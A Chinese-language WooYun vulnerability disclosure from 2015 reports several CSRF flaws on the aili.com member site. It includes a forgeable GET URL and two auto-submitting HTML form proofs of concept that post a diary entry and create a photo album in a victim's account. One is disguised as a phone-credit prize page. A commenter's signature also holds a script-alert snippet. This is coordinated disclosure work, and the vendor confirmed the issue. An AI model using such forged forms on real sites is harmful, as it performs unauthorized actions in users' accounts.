当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118491

漏洞标题:爱丽网漏洞小礼包(多处csrf)

相关厂商:aili.com

漏洞作者: 苏安泽

提交时间:2015-06-08 09:21

修复时间:2015-07-23 09:54

公开时间:2015-07-23 09:54

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

爱丽厂商我又来了!

详细说明:

漏洞证明:

1.爱丽网漏洞小礼包(二),爱丽厂商我又来了!
废话就不多说了,一个GET提交方式的CSRF漏洞。
写日志的地址:http://member.aili.com/note/add

1.png


可以看到我就一个sss和hack日志分类!
下面我们在创建日志分类这里抓包一下,请求数据我就不贴上去了。
通过分析,WEB端向index.php?c=member&m=room&a=addCate&cateName=(这里是你要创建的日志分类名)
看到提交是GET方式的,下面我们就直接构造地址就行了。
访问一下:http://member.aili.com/index.php?c=member&m=room&a=addCate&cateName=hacker

2.png


3.jpg


已经添加上了。
2.废话不多说咯!直接上SCRF POC代码和截图,一样是在写日志_个人空间这里。

1.jpg


发表日志的请求包我就不贴上了,POST请求的。没有Token验证,下面我们就构造一个表单。
SCRF POC代码如下:

<html>
<head>
<title>爱丽网漏洞小礼包(三)</title>
</head>
<body>
<form action="http://member.aili.com/?c=member&m=room&a=add" method="post">
<input type="hidden" name="title" value="wooyun.org">
<input type="hidden" name="cateid" value="435271">
<input type="hidden" name="dosubmit" value="1">
<input type="hidden" name="noteTags" value="wooyun.org">
<input type="hidden" name="bbs" value="1">
<input type="hidden" name="fud" value="15">
<input type="hidden" name="fid" value="16">
<input type="hidden" name="typeid" value="1">
<input type="hidden" name="content" value="%3Cp%3Ewooyun.org%3Cbr%3E%3C%2Fp%3E">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


下面来访问一下我构造的表单,截图如下:

2.png


3.png


3.不好意思啊厂商我不是我想拆开的,只是一直在寻找着。习惯搞一个提交一个!
继续贴上POC代码和截图。又是在个人空间的相册

1.png


请求数据包就补贴上去了,POST提交方式。没有token那么我们就构造一个表单吧!代码如下:

<html>
<head>
<title>答题活动赢取手机话费</title>
</head>
<body>
<form action="http://member.aili.com/?c=member&m=album&a=setalbum" method="post">
<input type="hidden" name="albumname" value="wooyun">
<input type="hidden" name="intro" value="wooyun">
<input type="hidden" name="dosubmit" value="%C8%B7%B6%A8">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


2.png

修复方案:

爱丽厂商。您好,您上次索要我的联系方式不小心给我点到删除了,麻烦再索要一次!

版权声明:转载请注明来源 苏安泽@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-08 09:52

厂商回复:

洞洞,补起来……

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-08 10:17 | 苏安泽 ( 实习白帽子 | Rank:73 漏洞数:25 | 敢不敢关注一下,<script>alert('关注成功'...)

    有事走小厂商,我的天啊,我16个WB币啊

  2. 2015-06-10 11:53 | 爱丽网(乌云厂商)

    WB币 能干啥? 你16个wb哪去了?

  3. 2015-06-10 19:02 | 苏安泽 ( 实习白帽子 | Rank:73 漏洞数:25 | 敢不敢关注一下,<script>alert('关注成功'...)

    @爱丽网 走了小厂商,两个漏洞你每个给我20WB币,但是就发给我4个,一个漏洞2个WB币。

  4. 2015-09-11 16:47 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    好已发crsf